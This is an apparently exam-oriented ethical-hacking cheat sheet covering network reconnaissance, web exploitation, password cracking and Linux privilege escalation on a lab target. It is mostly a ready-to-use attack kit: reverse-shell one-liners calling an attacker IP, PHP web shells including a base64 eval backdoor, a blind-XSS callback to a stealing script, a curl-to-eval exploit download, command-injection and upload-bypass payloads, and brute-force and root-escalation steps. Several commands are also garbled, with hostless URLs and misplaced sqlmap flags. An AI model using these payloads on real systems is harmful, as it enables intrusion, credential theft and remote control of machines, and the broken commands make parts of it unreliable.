Ethical Hacking Cheat Sheet (Color‑Coded)

*Red = command, Purple = input, Green = file content, Blue = take note, Yellow = might be different*

Basic Commands

ip a
ip a → look at eth0, IP address is there with subnet e.g. 10.10.1.2/24 → get network subnet

nmap
nmap 10.10.1.2/24 → scan network subnet (ignore your own IP and gateway, usually 10.10.1.1)
Mock test: target IP 10.10.1.3, output shows HTTP and SSH ports open

nmap -A
nmap -A 10.10.1.3 → aggressive scan to get all details

masscan
masscan -p1-65535 --rate 1000 10.10.10.0/24 -oL masscan.txt → fast full-port scan across a subnet, output to file

ssh
ssh username@ip_address → SSH into target (you can then run vim)


Reconnaissance & Information Gathering

whois – domain/IP registration info
whois example.com → get registrar, name servers, contact info

dig – DNS lookup
dig example.com ANY +short → all DNS records
Tip: add @8.8.8.8 to use a specific DNS server, -x for reverse lookup

host – simple DNS lookup
host -t mx example.com → MX records

nslookup – interactive DNS client
nslookup -type=txt example.com → TXT records

theHarvester – gather emails, subdomains, people
theHarvester -d example.com -b google -l 500 → search Google for 500 results

sublist3r – subdomain enumeration
sublist3r -d example.com -o subdomains.txt

amass – OWASP Amass deep subdomain enumeration
amass enum -d example.com -o amass.txt

shodan – search engine for internet‑connected devices
shodan host 8.8.8.8 → info on an IP
shodan search "apache"

censys – similar to Shodan (API)
censys ipv4 8.8.8.8

Google Dorks – advanced search operators for OSINT
site:example.com ext:log inurl:admin → find exposed admin logs
intitle:"index of" "parent directory" → find open directory listings
Tip: combine site:, inurl:, intitle:, filetype:, ext: for powerful queries


Web Stuff (HTTP)

If HTTP is open (port 80):
Open Firefox and connect to http://10.10.1.3

Directory brute‑force
gobuster dir -u http:// -w /usr/share/wordlists/dirb/common.txt → find directories/files like /admin, hidden zip/txt files, check for robots.txt (sometimes secret stuff is there)

ffuf – fast web fuzzer
ffuf -u http:///FUZZ -w wordlist.txt -mc 200 → fuzz for directories/files with matching status code

curl – transfer data, test endpoints
curl -k -X POST -H "Content-Type: application/json" -d '{"user":"admin"}' https:///api/login

Burp Suite – intercepting proxy
Start Burp, configure browser proxy to 127.0.0.1:8080, install CA cert. Use Proxy → Intercept to modify requests.

WPScan – enumerate
wpscan --url http:// -e u,vp,vt → enumerate WordPress users, themes, plugins

WPScan – brute‑force passwords
wpscan --url http:// -U -P /usr/share/wordlists/metasploit/unix_passwords.txt

Nikto
nikto -h http:// → vulnerability scanner (outdated server versions, exposed files, CVEs)


Web Application Exploitation

SQL Injection (SQLMap)

Basic usage:
sqlmap -u "http://" --batch &crawl=3
sqlmap -u "http://" --dbs &crawl=3
sqlmap -u "http://" -D --dump &crawl=3

Advanced options:
sqlmap -u "http:///page?id=1" -p id → test specific parameter
sqlmap -u "http://" --data "user=admin&pass=123" -p pass → POST data
sqlmap -u "http://" --cookie "PHPSESSID=abc123" → custom cookies
sqlmap -u "http://" --level 5 --risk 3 → aggressive testing
sqlmap -u "http://" --dbms mysql --technique BEUSTQ → force DB + technique
sqlmap -u "http://" --os-shell → attempt OS command execution
sqlmap -u "http://" --priv-esc → attempt privilege escalation via UDF
sqlmap -u "http://" --tamper=space2comment → bypass WAF
sqlmap -u "http://" --flush-session → reset session

Common discovery:
Look for parameters in URLs, POST bodies, cookies, headers. Use Burp Suite Scanner or Intruder. Test with single quote ' and observe errors.

Crack the MD5 hashes of passwords dumped from the ssh_users table (e.g., with John the Ripper or Hashcat).

Cross‑Site Scripting (XSS)

Tool/TechniqueDescriptionExample
Burp Suite IntruderSet payload positions, load XSS payload list, fuzz all inputsLoad payload list, sniper/ bombardier attack
OWASP ZAPActive scanning for XSSRight‑click → Attack → Active Scan
XSStrikeAdvanced XSS scannerxsstrike -u "http://example.com/search?q=TEST"
Reflected XSSPayload in URL, executed in victim's browser<script>alert(1)</script>
Stored XSSPayload saved in DB, rendered to all viewers<img src=x onerror=alert(1)>
DOM‑based XSSPayload executed via JavaScript in the page#<img src=x onerror=alert(1)>
Blind XSSPayload calls back to your server (e.g., <script src=http://yourserver.com/steal.js>)Host a logger, wait for request

File Upload Bypass

TechniqueDescriptionExample
Check extensionsTry .php, .php3, .phtml, .php5, .asp, .aspx, .jspUpload shell.php
Null byte injectionshell.php%00.jpgBypass extension check (PHP < 5.3.4)
Content‑Type spoofingSet Content-Type: image/jpeg while sending PHPUse Burp to modify request
Double extensionshell.php.jpgSome blacklists only check last extension
Path traversal in filename../../../tmp/shell.phpMay write outside upload dir

Command Injection

TestDescriptionExample
Simple injection; whoami, | whoami, && whoami, || whoamiInput field: ; cat /etc/passwd
BlindUse timing (sleep 5) or output redirection to a file you can read; sleep 5
Burp IntruderLoad list of ;, |, &, $(), `Sniper attack with command separators
Network toolsping, traceroute, nslookup with injected commands; ping -c 4 127.0.0.1

LFI (Local File Inclusion)

If you see PHP code like:
$file = $_GET['file']; include($file);

Enter in browser:
http:///?file=/etc/passwd → gives access to usernames

Then brute‑force the password and SSH in.


SQL Injection

Sometimes entering admin' # into an admin login username field changes the query to comment out the password → login without password.


PHP Shell Injection (via upload)

Upload a PHP file containing:
<?php echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>"; ?>

After upload, go to:
http:///path/to/shell.php?cmd=ls (or cat, etc.)


FTP

If FTP is open (port 21):
ftp 10.10.1.3 → try anonymous login: username anonymous, password (leave blank).


SQLMap

sqlmap -u "http://" --batch &crawl=3
sqlmap -u "http://" --dbs &crawl=3
sqlmap -u "http://" -D --dump &crawl=3

Crack the MD5 hashes of passwords dumped from the ssh_users table (e.g., with John the Ripper or Hashcat).


PHP Reverse Shell

Listener (attacker)
nc -lvnp 4444

PHP shell (if you can upload .php)
Save the following as shell.php (you can also get from https://github.com/pentestmonkey/php-reverse-shell):

<?php
// Set your attacker IP and port here
$ip = '<attacker_ip>'; 
$port = 4444;
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh -i', array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
?>

Upload and browse to http:///path/to/shell.php → you get a reverse shell.

Stabilising the shell

  1. In the reverse shell:
    python3 -c 'import pty; pty.spawn("/bin/bash")'

  2. Background it: press Ctrl + Z

  3. On your local Kali terminal:
    stty raw -echo; fg
    (Press Enter twice after this – normal to refresh the prompt)

  4. Inside the reverse shell:
    export TERM=xterm


Crack SSH Passphrase (Private Key)

<span style="color:red">cd .ssh</span>
<span style="color:red">cat id_rsa</span>

Copy the entire RSA key (from —BEGIN RSA PRIVATE KEY— to —END RSA PRIVATE KEY—) into a file, e.g. id_rsa.copy.
Then crack with John:

john --wordlist=/usr/share/wordlists/metasploit/unix_passwords.txt id_rsa.copy

To show cracked password:

john --show id_rsa.copy


John the Ripper – Password Cracking

Bruteforce a shadow/file:

john --wordlist=/usr/share/wordlists/metasploit/unix_passwords.txt output.txt

Show cracked passwords:

john --show output.txt

With Hashcat (GPU):

hashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/rockyou.txt


Metasploit Usage

  1. Start Metasploit console:
    msfconsole

  2. Search for WordPress AJAX load more file upload exploit:
    search wp_ajax_load_more

  3. Select the exploit (use the number shown or full path):
    use exploit/unix/webapp/wp_ajax_load_more_file_upload

  4. Show required options:
    show options

  5. Set options (adjust as needed):
    set RHOSTS
    set RPORT
    set LHOST
    set WP_USERNAME
    set WP_PASSWORD

  6. Before exploiting, log in to the WordPress site manually and confirm the email notification (if any) is correct.

  7. Run the exploit:
    exploit


Hydra – SSH Brute‑Force

hydra -l username -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh


Privilege Escalation

Kernel Exploit (example)

  1. Download exploit source (e.g., from Exploit-DB).
  2. Save as exploit.c.
  3. Compile:
    gcc exploit.c -o exploit
  4. Run:
    ./exploit

If gcc is not available, use a pure‑Python exploit (e.g., for CVE‑2021‑4034):
python3 cve-2021-4034.py

Find kernel version + search exploits:
uname -a → searchsploit linux kernel <version>

SUID Binaries

Find all SUID/SGID binaries:
find / -type f -perm -04000 -ls 2>/dev/null

Check https://gtfobins.org/ for known exploits.

Example – pkexec (CVE‑2021‑4034):
eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"

Alternative pure‑Python:
python3 /path/to/CVE-2021-4034.py

If a binary like nano has SUID:
1. Create a password hash for "password1" (example):
openssl passwd -1 password1
(outputs something like $1$...$hash)
2. Use nano (SUID) to edit /etc/passwd and replace a user's password field with the hash.
3. Then switch user: su <username> → you now have root.

Cron Jobs

View system cron:
cat /etc/crontab

List all cron dirs:
ls -la /etc/cron*; ls -la /var/spool/cron/crontabs/*

Common schedules:
- Every minute: * * *
- Every 5 minutes: /5 * * *
- Every hour, on the hour: 0 * * *
- Every day at 2:30 AM: 30 2 * *

- Every weekday at midnight: 0 0 * * 1-5
- Twice daily (noon & midnight): 0 0,12 * * *

If a cron job runs a script you can edit (e.g., /opt/backup.sh), replace its content with a reverse shell or add a line to spawn one, then wait for execution.

sudo Misconfigurations

Check what you can run as root:
sudo -l

Check env_keep / env_reset:
If env_reset disabled, you may inject LD_PRELOAD.

Examples:
- If you can run sudo apt-get update with a pre‑invoke hook:
sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/bash"
- If you can run sudo time:
sudo time /bin/bash
- If you can run sudo nano:
1. Open nano with sudo.
2. Press Ctrl + R to read a file, then Ctrl + X to exit.
3. At the prompt, type: reset; sh 1>&0 2>&0 and press Enter → you get a root shell.

Exploitation Frameworks & Utilities

ToolPurposeBasic Usage
Metasploit FrameworkExploit development, payloads, post‑exploitationmsfconsole → search <name> → use exploit/<path> → set RHOSTS <IP> → set LHOST <IP> → set LPORT <PORT> → exploit
HashcatGPU password crackinghashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
John the RipperCPU password crackingjohn --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
SearchSploitLocal ExploitDB searchsearchsploit <term>
Exploit‑DBOnline exploit repositoryhttps://www.exploit-db.com
GitHubSearch for PoCsgit clone https://github.com/<user>/<repo>

Quick Reference

Reverse Shells

Listener (attacker): nc -lvnp 4444

Bash target: bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

Python3 target: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP target: php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Netcat traditional: nc -e /bin/sh 10.0.0.1 4444

Netcat OpenBSD: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f

Web Shells (PHP)

<?php system($_GET['cmd']); ?>
<?= system($_GET['cmd']); ?>
<?php passthru($_REQUEST['x']); ?>
<?php eval(base64_decode($_SERVER['HTTP_ACCEPT'])); ?>

Tip: Upload any .php file to web root, browse to it, append ?cmd=ls to execute commands.

Burp Suite Shortcuts

ActionShortcut
Intercept on/offCtrl + Shift + I
ForwardEnter
DropCtrl + L
Send to RepeaterCtrl + R
Send to IntruderCtrl + I
Send to ScannerCtrl + U
Add to scope (from site map)Right Click → Add to scope
Define scopeProject → Scope
Match and replaceProxy → Options → Match and Replace

Post‑Exploitation Commands (Linux)

GoalCommand
Spawn a TTY shellpython3 -c 'import pty; pty.spawn("/bin/bash")'
Upgrade shellCtrl+Z → stty raw -echo; fg → reset
Find SUID binariesfind / -type f -perm -4000 -exec ls -la {} \; 2>/dev/null

End of cheat sheet.